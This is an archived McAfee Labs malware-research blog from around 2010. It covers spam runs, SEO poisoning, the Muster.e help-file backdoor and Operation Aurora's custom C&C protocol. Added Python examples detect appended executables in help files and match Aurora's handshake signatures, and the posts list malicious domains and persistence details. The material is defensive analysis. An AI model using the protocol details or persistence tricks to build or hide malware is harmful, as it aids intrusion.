Archive for the 'Malware Research' Category

Facebook Suffers ‘Password Reset’ Scam

Today has been quite a busy day for scammers. We at McAfee Labs have been tracking a global scam/spam run that targets Facebook users. The lure used in the run is a familiar one:

Facebook Password Reset Confirmation! Customer Support.

The email looks like the following:

[Image: Facebook Email Scam]

The activity on this particular scam run has been global from the beginning, and thanks to our Artemis “cloud” technology we have dealt with it very efficiently. The malware in the attachment is pretty much what one would expect: downloaders, password-stealing Trojans, fake AV, or bot components, depending on which one you got. Check out the Artemis map of this malware:

[Image: Global Artemis Activity]

To give you an idea of the scope of the run, it reached as high as No. 6 (!) on our Global Virus Map’s Top 10, which tracks consumer detections worldwide. It even accounts for as much as 10 percent of the infected email that our managed email SaaS unit is seeing. From the looks of the spams themselves they may be associated with the Cutwail or Rustock botnets, but that analysis is still ongoing.

As we had previously discussed in our 2010 Threat Predictions, social networking sites will continue to be a favorite social engineering lure for cybercriminals to distribute malware. Make sure you are protected and educated.

You can submit information about any fake Facebook email to the Facebook Security Team. Facebook also has a great security page that I recommend to all Facebook users.

Wiseguys Botnet First in Line for Concert, Sports Tickets

We frequently read stories about spammers who can circumvent CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) authentication. Using bot-infected machines, they can create a vast number of random e-mail accounts for spamming purposes.

This week, a federal judge in Newark, New Jersey, revealed the latest use of a botnet-like network with a CAPTCHA breaker. In this case, the computers overseen by the defendants were used to buy seats for high-profile concerts and sports events from ticket sellers’ websites. The defendants later allegedly resold the tickets on the Internet at much higher prices.

According to the indictment, the distributed software was developed by some programmer accomplices in Bulgaria. The application defeated security measures designed to limit individual ticket purchases and snatched up the best ones. Unlike botnets we frequently encounter, this one was set up on dedicated computers designed solely for this purpose. The botnet purchased more than 1.5 million premium tickets to events from late 2002 to about January 2009, making a profit estimated at $28.9 million.

The employees, contractors, and defendants behind this rip-off are known as the “Wiseguys,” based on the name of the Nevada corporation they created (Wiseguy Tickets, Inc.). The Wiseguys botnet was a nationwide network of computers used to purchase thousands of tickets within minutes. The botnet:

  • Monitored the online ticket vendors’ websites for the exact moment that tickets to popular events went on sale
  • Opened thousands of connections at the instant that tickets went on sale
  • Defeated the CAPTCHA challenge in a fraction of a second (a human needs five to ten seconds), thus speeding ahead of legitimate buyers
  • Supervised by Wiseguys employees, prepared lists of hundreds of the best tickets almost instantly
  • Filled in all the fields necessary to complete the purchases, including customer credit card information and false e-mail addresses

The indictment explains how the Wiseguys took advantage of many popular events such as the BCS college football championship game, the Barbra Streisand concert in Chicago, Hannah Montana concerts in New Jersey, and the 2008 Bruce Springsteen Tour. For this last event, the botnet was able to purchase approximately 11,800 tickets.

One of their last crimes occurred in January 2009, according to the indictment, when the botnet impersonated 1,000 individual ticket buyers for the New York Giants vs. Philadelphia Eagles NFL playoff game at Giants Stadium in East Rutherford, New Jersey.

This affair is a perfect example of a targeted attack (here against the online ticket vendors) using malware that is not widespread. The affair demonstrates how important it is for administrators to keep watch over their networks and watch for even the slightest anomalies.

Check out this video for CNN’s coverage.

On Olympics, St. Patrick’s Day, Screensavers, and Wallpaper

The combination of search engine optimization with sporting and holiday news continues to fascinate me. Oh, and did I mention malware and malicious websites? They always make for interesting bedfellows.

The Olympics have been getting massive coverage, of course, and St. Patrick’s Day is just around the corner. We can count on these events to provide cybercriminals with plenty of search engine manipulation possibilities and social engineering lures.

I ran a few basic Google searches and got pretty much what I expected: malicious sites and malware links. Starting with some basic Olympics-based searches, first for Olympic Games Wallpaper:

[Image: Malicious Olympic Wallpaper Search]

For this search three of the top five results lead to malicious links (not good). The next search moved onto Olympics-themed screensavers (which historically are heavily abused):

[Image: Malicious Olympic Screensavers]

In this case two of the 10 results on the first page lead to malicious websites–actually less than I expected. But look what happened when I added the word download to my search:

[Image: Malicious Olympic Screensaver Download Search]

In this case five of the 10 results on the first page were now malicious or questionable. Quite interesting. When I added an -s to download my results “improved” to six malicious entries!

Next I moved on to the theme of St. Patrick’s Day for wallpaper and screensavers. Lo and behold, just about the same types of results:

[Image: St Patrick's Day Wallpaper Search]

Just shy of half the results on the first page lead to some very nasty sites indeed for wallpaper. Next I also searched for themed screensavers:

[Image: St Patrick's Day Screensaver Search]

Again, just about half the results on the first page lead to malicious links. That’s not surprising but certainly not good. Just remember this trend: news, sporting events, and holidays are common abuse targets for cybercriminals. Be suspicious when searching for info in any of these areas (and in many others). Safe-searching technologies such as SiteAdvisor are more important than ever.

Today’s cybercriminal is smart and prepared. Let’s all be smarter and better prepared.

Valentine’s Day Searches Lead to Malware

5, 4, 3, 2, 1…malware!

It’s like clockwork, ain’t it? A popular holiday–such as Valentine’s Day–approaches, and malware authors and cybercriminals ready themselves for it.

I have done some Valentine’s Day searches for poisoned terms and found some nasty ones very quickly. Screensavers and ecards are always popular:

[Image: Valentine ScreenSavers]

[Image: Valentine eCards]

Even Rolex watches on Valentine’s Day are not safe:

[Image: Valentine Rolex]

Some of the poisoned terms I have seen today:

Valentine’s Day Screensavers
Valentine’s Day Downloads
Valentine’s Day Wallpaper
Valentine’s Day Rolex
Valentine’s Day eCards
Animated Valentine’s Day
Valentine’s Day Greetings
Valentine’s Day Cupids
Valentine’s Day Gift Ideas

Make sure you surf safely with SiteAdvisor and keep that machine updated!

McAfee Labs Quarterly Threat Report Posted

Today we unveiled our Threats Report for the fourth quarter of 2009. It highlights many of the most significant spam-generating stories in 2009 as well as the rise of political hacktivism in countries such as Poland, Latvia, Denmark, and Switzerland. The report’s findings also reveal that 2009 averaged approximately 135.5 billion spam messages per day; yet spam volume decreased by 24 percent in Q4 compared with Q3.

Spammers piggybacked heavily on leading headlines in 2009, taking advantage of breaking news stories, global tragedies, and other timely events. The Air France plane crash and Michael Jackson’s death were among the top tragedies exploited by spammers last year. McAfee researchers also noted a significant number of 2010 FIFA World Cup-themed phishing scams, Zeus Trojans masked as the CDC and referencing the H1N1 vaccine program, and “get rich quick” scams due to the rise of U.S. unemployment levels.

Politically motivated attacks are on the rise around the world, targeting popular social networking destinations, as seen recently with the Iranian Cyber Army’s political attack aimed at Twitter. The report confirms that the United States is not the sole target, nor is China the sole origin for these types of assaults. Recent political attacks targeted the Polish government, the Copenhagen Climate Conference, and Latvia’s Independence Day.

Malware–including fake security software, attacks on social networks, and AutoRun USB infections–continued to rise significantly last year. Internet-based, Web 2.0-centric attacks and threats on portable storage devices played a huge role in 2009, contributing greatly to the immense increase in threats and demonstrating how the nature of computer threats is evolving over time. Cybercriminals used social networking sites to target a new generation of victims, with Koobface activity increasing considerably during the latter part of 2009. Koobface is now hosted by servers in 46 countries, with the United States, Germany, and Denmark making up the top three hosting locations.

China Overtakes the U.S. as No. 1 Country Producing Zombies

Zombie production in the U.S. dropped significantly, from 13.1 percent in Q3 to 9.5 percent in Q4, making China the top Zombie-producing country at 12 percent. Brazil ranked third, with Russia and Germany rounding out the top five countries. The United States still remains the number one country in spam production, with Brazil and India taking the number two and three spots. Ukraine and Germany joined the list of top 10 countries producing spam for the first time in 2009.

The Geographic Distribution of Web Threats

North America is the worldwide leader in hosting malicious content, with Europe/Middle East/Africa second, followed by Asia/Pacific. In Europe, Germany holds the number one spot, followed by the Netherlands and Italy. China is the chief host for malicious content in Asia, followed by Russia and South Korea. South America is beginning to play a larger role, with Brazil as the top hosting country in that region.

China is the Worldwide Leader in SQL-Injection Attacks

Although SQL-injection attacks originate from a number of countries across the globe, China was by far the number one country hosting these assaults, at 54.4 percent. Due to the growing popularity of Adobe applications, McAfee Labs saw a number of client-targeted attack attempts to exploit Flash and Acrobat Reader.

A full copy of the Q4 2009 Threats Report is available here.

Be careful on help files

The other day, I came across a piece of malware that attempts to hide its infection in a way that is not especially technical but is quite unique.

“Muster” is a family of backdoors that uses help files to hide itself. Help files, or “.hlp” files, are data files designed to be viewed with the Microsoft WinHelp browser to provide online help for application users. Earlier variants of “Muster” drop encoded copies of the main backdoor components in files with the extension “.hlp”. These “.hlp” files are later decrypted with the Microsoft CryptoAPI using hardcoded keys and executed by loaders.

A recent variant, “Muster.e”, uses help files in a different way. Once installed, it infects an existing help file called “imepaden.hlp”, one of the help files for Microsoft IME. This infected help file can still be viewed with the WinHelp browser in the same manner as the original help file, and users are unlikely to notice the infection from the view.
[Image: Infected imepaden.hlp]
How is this activated upon each machine boot? Muster.e also drops a sys file that is loaded as a service upon reboot. This sys file is responsible for extracting the appended executable from the help file and copying it to a standalone executable called “upgraderUI.exe”, registered under the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run as AutoPatch, which leads users to believe it is something related to a system update tool. On top of this, the malware authors have also crafted the sys file to deceive users.
[Image: Sys file]
As you can see, this sys file contains names such as “MyDDKDevice” and “HelloDDK” and is designed to dump many debug messages; it looks like a typical test driver compiled from sample code in a beginner’s guide to device driver programming. In fact, if you search for these words you will find many web pages describing device driver programming. It is not easy to tell why the authors created the sys file this way. However, given the effort spent on hiding backdoors in help files, I don’t think the bad guys simply couldn’t be bothered to write a sys file from scratch; it seems more like an attempt to trick users into thinking it is innocent.

One of the likely scenarios planned by the malware authors is this. Victims may notice the suspicious file UpgraderUI.exe and the registry key, and delete both. They would then think they had removed the backdoor successfully. Even if they notice that the file and the registry key come back again and again on each reboot, they will not be able to find any other suspicious files. Users would never suspect that the sys file is malicious, or that the file imepaden.hlp has been infected.

I don’t know if these deception techniques really work; however, you might want to add help files to your checklist if your machine is suspected to be infected. McAfee VirusScan with DATs 5861 or later detects and cleans those infected help files and backdoor files.
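One way to put help files on that checklist is to look for a Windows executable tacked onto the end of a .hlp file, which is what Muster.e leaves behind in imepaden.hlp. The scanner below is an added example, not McAfee’s code: it finds any DOS “MZ” header whose e_lfanew field points at a “PE\0\0” signature, and the sample help files it runs on are constructed (only the leading WinHelp magic number is real).

```python
"""Scanner for executables appended to WinHelp (.hlp) files.

Added example for the Muster.e technique described above, not McAfee's code.
A hit requires a DOS "MZ" marker, a complete 64-byte DOS header, and an
e_lfanew (offset 0x3C) that lands on "PE\\0\\0" inside the file, which is how
an appended Windows executable is recognisable whatever help content sits in
front of it. The sample files at the bottom are constructed.
"""
from typing import Dict, List

# Little-endian 0x00035F3F, the magic number at offset 0 of a WinHelp file.
WINHELP_MAGIC = b"\x3f\x5f\x03\x00"
DOS_HEADER_LEN = 0x40


def find_embedded_pe(blob: bytes) -> List[int]:
    """Return the offsets of every plausible PE image inside blob.

    A bare "MZ" inside help text is not reported: the DOS header must be
    complete and e_lfanew must point past it to a real PE signature.
    """
    hits = []
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + DOS_HEADER_LEN <= len(blob):
            e_lfanew = int.from_bytes(blob[pos + 0x3C:pos + 0x40], "little")
            sig = pos + e_lfanew
            if e_lfanew >= DOS_HEADER_LEN and blob[sig:sig + 4] == b"PE\x00\x00":
                hits.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return hits


def inspect_help_blob(blob: bytes) -> Dict[str, object]:
    """Summarise a help file's contents for triage."""
    hits = find_embedded_pe(blob)
    return {
        "looks_like_winhelp": blob[:4] == WINHELP_MAGIC,
        "size": len(blob),
        "embedded_pe_offsets": hits,
        "suspicious": bool(hits),
    }


def inspect_help_file(path: str) -> Dict[str, object]:
    """Read a .hlp file from disk and triage it."""
    with open(path, "rb") as fh:
        return inspect_help_blob(fh.read())


def _constructed_pe_image() -> bytes:
    """Stand-in for the appended backdoor executable (constructed): a DOS
    header with e_lfanew = 0x80, padding, a PE signature, then filler."""
    dos = bytearray(DOS_HEADER_LEN)
    dos[0:2] = b"MZ"
    dos[0x3C:0x40] = (0x80).to_bytes(4, "little")
    return bytes(dos) + bytes(0x80 - DOS_HEADER_LEN) + b"PE\x00\x00" + bytes(64)


def constructed_samples() -> Dict[str, bytes]:
    """Three constructed files: a clean help file, one whose text happens to
    contain the letters "MZ", and one with an executable appended to it."""
    body = WINHELP_MAGIC + b"|SYSTEM constructed help topic text ... " * 4
    return {
        "clean": body,
        "clean_with_mz_text": body + b"see MZ-series notes",
        "infected": body + _constructed_pe_image(),
    }


if __name__ == "__main__":
    for name, blob in constructed_samples().items():
        print(name, inspect_help_blob(blob))
```

Point inspect_help_file at the help files under a Windows directory to triage a suspect machine; a hit reports the offset where the appended image begins.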

Update on Recent Microsoft 0day (CVE-2010-0249)

Here’s a quick update on CVE-2010-0249, aka the Aurora exploit. A few days ago exploit code was made public. Since then malware authors have been customizing the exploit’s payload to install their own malicious creations. Much of the field telemetry we’ve been receiving has been coming from McAfee users in China visiting websites in China. Some users have been directed to malicious sites from blog and forum posts, while other cases involve compromised web pages that use multiple JavaScript files and iframes to pull in the malicious content.

The exploits are often served from subdomains of 3322.org and 8866.org. A common filename is ie.html, which references what.jpg, which contains part of the exploit code (and not a JPEG image). Some of the payloads seen download files named down.css and log.css, which are malware executables. Those executables contain functionality to download other malware, including:

  • Artemis!629E2332CFDA – Generic PWS.y!bsk
  • Artemis!78043EBA321B – PWS-Mmorpg!la
  • Artemis!911BCF95C022 – PWS-OnlineGames.gx
  • Generic Downloader.x!coe
  • Generic Dropper!byp
  • Generic PWS.y!bsk
  • PWS-Mmorpg!la
  • Suspect-02!50CB7D4BB04E – Generic Dropper.hi
  • Suspect-26!4EBF601DCBF6 – PWS-Mmorpg!la
  • Suspect-26!6D89EB2792F7 – PWS-Mmorpg!hb
  • Suspect-26!B01B63F88994 – PWS-Mmorpg!la

Given that exploit code is readily available, this is likely the tip of the tip of the iceberg in terms of the domains and malware we are likely to see over the next few weeks (and we can expect to see new exploit and related malware variants for many months, if not years, to come).

Earlier today, Computerworld reported that private exploits were created which exploit Internet Explorer 7 and 8, but that those exploits would remain private. Still, this publicity may entice others to meet the challenge and go public to prove their prowess.

On the bright side, Microsoft said today that it would release an out-of-cycle patch for this vulnerability. McAfee Labs advises those tempted to install an unofficial patch to think twice before doing so, as malware and adware often arrive under the guise of such a “fix”.

An Insight into the Aurora Communication Protocol

As we know, the recent Operation Aurora has been making waves due to a highly organized attack targeting companies such as Google, Adobe and other high profile companies. A security breach due to a vulnerability in Microsoft’s Internet Explorer, CVE-2010-0249, caused remote code execution leading to download of malware on compromised systems.

At McAfee Labs, researchers have been working around the clock across regions to delve deeper into the inner workings of this attack in an effort to educate and assist customers in its mitigation. In this blog we discuss the communication protocol used by Aurora, which shows how organized and technical this attack is.

We also discuss the backdoor components of Aurora which would allow the hackers to take complete control of the victim’s machine. The backdoor components, which were dropped in the system by Roarur.dr after the successful exploitation by Exploit-Comele, are composed of several variants of Roarur.dll.

All samples used highly obfuscated code, with small pieces of code connected via jumps and calls, and separated by NOPs:

One thing in common between these DLL variants is the protocol used to communicate with the command & control server. Let’s take a look at how this protocol works.

After the initialization of the malware DLL, a connection is made to the command and control (C&C) server. The connection is made on port 443 which is usually used by the HTTPS protocol, encrypted with SSL. During analysis, we noticed that the employed protocol on this port was not the standard SSL protocol, but a custom encrypted protocol.

The backdoor client initiates the protocol by issuing a packet which always has the same first 20 bytes:

[ ff ff ff ff ff ff 00 00 fe ff ff ff ff ff ff ff ff ff 88 ff ]

After the initiator handshake, the protocol uses a 20 byte packet as header for all communication that follows. All data sent from client to server is encoded with a logical NOT, and all data received from server is XOR encoded with 0xCC. So the first reply from server would be:

[ CC CC CC CC CD CC CC CC CD CC CC CC CC CC CC CC XX XX XX XX ]

(where XX can represent any byte)

The handshake is followed by information gathering. The backdoor gathers the following information from the victim’s machine and sends it back to the server:

  • Content of HARDWARE\DESCRIPTION\System\CentralProcessor\MHz registry key
  • Service pack name
  • Machine name
  • OS Version

At the time the operation was made public by Google, the control servers were offline, hence we don’t have access to the actual communication. However after understanding the protocol and the expected commands at the client end, we were able to set up a fake environment allowing us to initiate commands to the client. In this way we were able to force the malware to behave in a way we requested.

Based on this, we found that the structure of the header is the following:

Commands can have any value between 0x02 and 0x14, which gives the hacker 18 possible commands. But these commands can be extended by the use of parameters, which change the behavior of the command executed:

One interesting note on the protocol is the fact that each client uses a different encryption key to obfuscate the data sent to server. It makes a call to GetTickCount() to generate a random encryption key which is sent as part of the header in the outgoing packet. This key is used to encrypt the data between client and server afterwards. Indeed an interesting approach.

The “extra data” part of the packet can contain any information the hacker wants. Based on the commands executed, this could be which drives/files the user has on the system, information to install a new service, or even a file to drop on the system.

The transmission of this extra data is made in two steps:

  • The backdoor receives the header, decrypts it with XOR 0xCC and gets the command
  • The command is executed
  • Based on the command, if there is extra data to receive, it gets the extra data size and checks that the encryption key is the same as the one sent before
  • An XOR 0xCC decryption is applied to the extra data
  • The extra data is then decrypted with the given encryption key
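The two fixed encodings and the handshake above are enough to recognise this channel on port 443 and to strip the outer layer from server packets, which is roughly what a network signature for it has to do. The following is an added example, not McAfee’s code or the backdoor’s: it models only what the write-up states (the 20-byte client opener, NOT-encoded client data, XOR 0xCC server data, the first server reply, the 20-byte header) and leaves the undisclosed header field layout and per-client GetTickCount()-derived key out; the replayed session is constructed.

```python
"""Decoder and session classifier for the custom Aurora C&C channel.

Added example built only from what the write-up states. The header field
layout and the per-client key cipher are not given, so they are not modelled.
"""
from typing import Tuple

HEADER_LEN = 20
SERVER_XOR_KEY = 0xCC

# Fixed first 20 bytes of the client's opening packet (from the write-up).
CLIENT_HANDSHAKE = bytes.fromhex("ffffffffffff0000feffffffffffffffffff88ff")

# First server reply as seen on the wire, minus its four variable trailing bytes.
SERVER_REPLY_ENCODED_PREFIX = bytes.fromhex("cccccccccdcccccccdcccccccccccccc")


def encode_to_server(data: bytes) -> bytes:
    """Client -> server encoding: bitwise NOT of every byte (self-inverse)."""
    return bytes((~b) & 0xFF for b in data)


def decode_from_server(data: bytes) -> bytes:
    """Server -> client decoding: XOR every byte with 0xCC (self-inverse,
    so the same function also produces server-side encoding)."""
    return bytes(b ^ SERVER_XOR_KEY for b in data)


def is_client_handshake(first_packet: bytes) -> bool:
    """True when the client's opening packet starts with the fixed signature."""
    return first_packet[:HEADER_LEN] == CLIENT_HANDSHAKE


def is_server_handshake_reply(first_reply: bytes) -> bool:
    """True when the server's first packet matches the documented reply;
    the last four header bytes vary per session and are ignored."""
    return (len(first_reply) >= HEADER_LEN
            and first_reply[:16] == SERVER_REPLY_ENCODED_PREFIX)


def split_server_packet(encoded: bytes) -> Tuple[bytes, bytes]:
    """Strip the XOR 0xCC layer from a post-handshake server packet and split
    it into the 20-byte header and the trailing extra data. The extra data is
    returned still under the per-client key layer the write-up does not specify."""
    if len(encoded) < HEADER_LEN:
        raise ValueError("packet shorter than the 20-byte header")
    plain = decode_from_server(encoded)
    return plain[:HEADER_LEN], plain[HEADER_LEN:]


def classify_session(client_first: bytes, server_first: bytes) -> str:
    """Classify the opening exchange of a TCP/443 session.

    "aurora-backdoor": both sides match the custom handshake.
    "tls-like": the client opens with a TLS handshake record (content type
    0x16, major version 0x03), i.e. what port 443 normally carries.
    "unknown": anything else.
    """
    if is_client_handshake(client_first) and is_server_handshake_reply(server_first):
        return "aurora-backdoor"
    if len(client_first) >= 2 and client_first[0] == 0x16 and client_first[1] == 0x03:
        return "tls-like"
    return "unknown"


def demo_session() -> dict:
    """Replay a constructed session: handshake, first reply, a host-info
    report from the client, and one post-handshake server packet."""
    # Constructed server reply: documented prefix plus four arbitrary bytes.
    server_reply = SERVER_REPLY_ENCODED_PREFIX + bytes.fromhex("1a2b3c4d")
    # Constructed host-info report, as the client would NOT-encode it.
    report = b"Service Pack 3|WORKSTATION-01|5.1|2400"
    # Constructed server packet: an all-zero 20-byte header plaintext followed
    # by extra data, both XOR-0xCC encoded on the wire.
    server_cmd = decode_from_server(bytes(HEADER_LEN) + b"extra")
    header, extra = split_server_packet(server_cmd)
    return {
        "verdict": classify_session(CLIENT_HANDSHAKE, server_reply),
        "reply_plain": decode_from_server(server_reply).hex(),
        "report_on_wire": encode_to_server(report).hex(),
        "report_roundtrip": encode_to_server(encode_to_server(report)) == report,
        "header_plain": header.hex(),
        "extra_plain": extra,
    }


if __name__ == "__main__":
    for key, value in demo_session().items():
        print(f"{key}: {value}")
```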

We believe this is how the file Acelpvc.dll was dropped on the system. This is another backdoor component, which can be installed as a service and receives two parameters: IP and port.

Acelpvc.dll, once loaded, opens a connection to this server:port using the same encrypted protocol. This way the hackers could make the victim’s computer connect to another server and guarantee their access to the system even if the first connection is cut.

As you can see, this attack involved very advanced methods, with several pieces of malware working in concert to give the attackers full control of the infected system while disguising the traffic as an ordinary connection to a secure website. This way the attackers were able to covertly gather all the information they wanted without being discovered.

Hopefully this brief will provide users with a good basic understanding of the custom backdoor protocol used during Operation Aurora. Stay tuned for more information on Aurora as McAfee dissects it  :)

Update Jan 19, 2010 (product coverage update)
McAfee Network Security Platform: The UDS release of January 19 contains the signature “UDS-BACKDOOR: Operation Aurora Channel Detected” to detect this backdoor.

Went Looking for IE Exploits in “Haiti”, Found Something Else

In my last post I mentioned that the “Operation Aurora” exploit code was public and that we could expect other attacks leveraging the CVE-2010-0249 exploit to emerge. Given the significance of the recent earthquake in Haiti, and the slew of phishing sites, email scams, etc., it makes sense that attackers would try to combine an unpatched Internet Explorer vulnerability with Haiti-related web content.

I figured a good place to look for attackers was by Googling the most popular search terms of the day. It’s been a while since I last researched search engine manipulation. As expected, it was quite easy to find high-ranking search results for Haiti-related terms; the vast majority led to rogue antivirus sites, similar to earlier blogs. I did not come across any sites exploiting the recent zero-day IE vulnerability. However, I did come across plenty of clickjacking, and not just clickjacking: the attackers have incorporated Google Trends, Digg.com, blackhat SEO, and clickfraud as well.

Here’s the apparent flow of the attack:

The attacker finds a hot search term using Google Trends or some other keyword tracking site (and perhaps anticipates term variations):

Next, they create the malicious web page (more below) and submit an entry to Digg.com using the same title, and a description that includes a bunch of relevant terms.  They also Digg the story (+1):

Seemingly the affiliation with Digg.com, the association of the title (taken from Google Trends), and description help boost the ranking in Google’s search results:

When a user follows the link on Digg.com, they are taken to a generic website enticing them to click on a “Play” icon.

What the user doesn’t see is the content that sits behind the image.  When a user clicks on the image, that click is passed along to an advertisement delivered through Google’s ad network (note the sites in the image below are potential victims here too as they could be charged for “unwanted clicks” on their ads).

This form of Clickfraud can generate money for the attacker.  If this fraud goes unnoticed, the advertiser would likely pay a referral fee to the attacker.

The web server shows many search terms seeded this way, including several related to Haiti:

  • haiti-breaking-news
  • haiti-earthquake-damage
  • haiti-earthquake-info
  • haiti-earthquake-relief
  • haiti-earthquake-time
  • haiti-pact-with-the-devil
  • haiti-pat-robertson
  • haiti-relief-effort
  • haiti-support
  • haitian-earthquake-relief
  • haitian-relief-efforts
  • hatia-earthquake-pictures

I should note that this isn’t so much a Haiti-targeted attack, but rather an attack targeted at any popular topic on the web right now.  In fact, they’re poisoning the term “internet security 2010 virus removal”, which exists because web users fell victim to rogue antivirus software, some undoubtedly due to the same type of search engine poisoning.

“Operation Aurora” Leading to Other Threats

Operation Aurora has received a lot of attention over the past couple of days.  To recap, Google, Adobe, and many other companies were attacked with code exploiting a zero-day vulnerability in Internet Explorer.  Since the announcement of this vulnerability (CVE-2010-0249), exploit code has been made public and already revised into a more usable form.

History tells us that when exploit code targeting an unpatched vulnerability in popular software is released, a slew of attackers are ready, willing, and able to capitalize. What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users. This often takes the form of drive-by download sites serving malware to unsuspecting users, lured by links spammed in email, social networking sites, blogs, and poisoned search engine results.

For more information on this vulnerability, the Operation Aurora attack, and ways to protect your environment see:
More Details on “Operation Aurora”

More Details on “Operation Aurora”

Earlier today, George Kurtz posted an entry, ‘Operation “Aurora” Hit Google, Others’, on McAfee’s Security Insight blog. The purpose of this blog is to answer questions about this particular attack and to fill in some of the threat flow and McAfee coverage details.

How were systems compromised?
When a user manually loaded/navigated to a malicious web page from a vulnerable Microsoft Windows system, JavaScript code exploited a zero-day vulnerability in Internet Explorer;  Microsoft Internet Explorer DOM Operation Memory Corruption Vulnerability.  Microsoft has released Security Advisory (979352) for this vulnerability (CVE-2010-0249).

What was the payload of the exploit?
Once a system was successfully compromised, the exploit was designed to download and run an executable from a site, which has since been taken offline.  That executable installed a remote access Trojan to load at startup.  This Trojan also contacted a remote server.  This allowed remote attackers to view, create, and modify information on the compromised system.

How wide-spread is this attack?
Aurora appears to have been a very concentrated attack on specific targets.  It is not believed to be widespread at this time.

How serious is this vulnerability?
The Microsoft Internet Explorer vulnerability leveraged in this attack allows for remote code execution, but does require user intervention (such as following a hyperlink to a website or opening an email attachment). Furthermore, the single exploit known to exist can be thwarted by Data Execution Prevention (DEP), enabled by default in Internet Explorer 8 and optionally in Internet Explorer 7. Microsoft lists the following combinations as vulnerable: Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

How are McAfee customers protected from this attack?
McAfee DAT files (antivirus): Coverage will be provided for associated malware (as Exploit-Comele, Roarur.dr, and Roarur.dll) in the 5862 DATs, releasing January 15. Partial coverage is provided in the current (5861) DATs for some components as Generic.dx!kwv, Generic Spy.e, Spy-Agent.ey, and Exploit-Comele.

McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Network Security Platform: The UDS release of January 14 contains the signature “UDS-HTTP: Microsoft Internet Explorer HTML DOM Memory Corruption” which provides coverage.

McAfee Vulnerability Manager: The FSL/MVM package of January 14 includes a vulnerability check to assess if your systems are at risk.

Updated Jan 14
McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts, and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E); proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 16
McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts, and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E); proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 18
McAfee Network Security Platform: Extended coverage is provided in the January 18 UDS release via the “Microsoft Internet Explorer HTML DOM Memory Corruption III” signature. Coverage was originally provided in the UDS release of January 14.

McAfee Application Control: All versions of McAfee Application Control protect against infection, without updates, and will prevent all versions of the “Aurora” attack witnessed to date.

McAfee Firewall Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts. The embedded McAfee AV scanning engine in Firewall Enterprise version 7.0.1.02 and later provides coverage for supported protocols via standard McAfee DAT updates. Coverage for known exploits and associated malware is provided as Exploit-Comele, Roarur.dr, and Roarur.dll in the 5862 DATs, released January 15.

McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

Updated coverage information will be communicated through McAfee Security Advisories:
http://www.mcafee.com/us/threat_center/securityadvisory/signup.aspx

McAfee Labs’ January Spam Report

Angelina Jolie and Barack Obama are the #1 celeb subjects of choice for spammers, according to our January Spam Report. The report also reveals:

  • The top 25 men and women that were spammed
  • Chinese pharma spam isn’t going away – in fact, on Dec 14, spam levels skyrocketed with subject lines advertising discounts on Pfizer drugs
  • “Free-hosting” websites have become a major target for spammers, who use them to provide spam URLs

Be mindful of those celebrity names that appear in your inbox! Download the full report here.

W32/Fame

The first malware authors wrote viruses seeking fame through destruction; today’s authors are motivated instead by financial gain.

Nevertheless, there are still the ones out there who share the first authors’ intent. I was analysing a simple Trojan today and saw the following message:

[Image: Code]

It is not uncommon for malware authors to leave messages in their code for researchers to read.

This one did bring a smile to my face, so he was rewarded by it being named BackDoor-EKD which is an increment of one from BackDoor-EKC ;)

Fake Alert Uses McAfee-like Domain Name to Attract Victims

Cybercriminals love to use social engineering techniques to trick users into installing their malware. One of the latest fake-alert variants attempts to trick users into believing the software is related to or hosted by McAfee: mcafeevirusremover.com.

With DAT release 5835 (December 17) McAfee detects the HTML code for the domain as FakeAlert-KW!htm and the associated Trojan as FakeAlert-KW. The script hosted by the domain can attack the Windows browsers Internet Explorer, Mozilla Seamonkey, and Chrome. The script also affects browsers on Linux platforms.

This fake-alert variant is hosted on at least 13 other known domains. McAfee’s TrustedSource blocks the IP addresses and the domains (including DNS and mail servers) associated with this Trojan. For example:

TS Screenshot

The infection begins by redirecting the victim to the domain hosting the Trojan script code. This website is designed to look like Windows Explorer in Windows XP. It “reports” multiple infections on the victim’s computer:

Domain screenshot

If the user clicks anything within the browser, the FakeAlert-KW Trojan will download. Once it is installed, the Trojan offers a graphical interface designed to appear as a legitimate security application reporting multiple infections on the victim’s computer:


Infected machines will also suffer a barrage of pop-up balloons from the System Tray warning of various problems that require the user to register the software for a fee to “clean” the system:


Remember to update your McAfee products to ensure you are protected from these threats.

Dragons Everywhere: The 26th Chaos Communication Congress, Part 2

Day 2 and Night 2 of the 26th Chaos Communication Congress are over, so it’s time for a short update on what you are missing here.

This year the Congress is organized as a distributed event: Many local Hacker Spaces have joined the network at Berlin Conference Center, giving access to resources and talks to visitors. Check out the Dragons Everywhere Wiki at 26c3 for more info. And of course there are still the live streams of the talks available.

One highlight was certainly an update on the current debate around the Vorratsdatenspeicherung (“data retention”). CCC spokesperson Constanze Kurz expects a favorable ruling against the current laws by the highest German court. This may have an EU-wide impact.

At the same time (and thank goodness there were streams available!) was Collin Mulliner’s talk about fuzzing smart phones and some of his (and Charlie Miller’s) findings.

Felix “FX” Lindner changed sides: In a talk covering defense instead of breaking things, he demonstrated the security problems that come with Flash and released Blitzableiter (“lightning rod”), a tool for sandboxing .swf files to prevent a class of Flash exploits. His tool is still work in progress but looks very promising already.

And to finish the day there was the Phonoelit Party at c-base, featuring Mumpi, Vela, and Illo. Another great event!

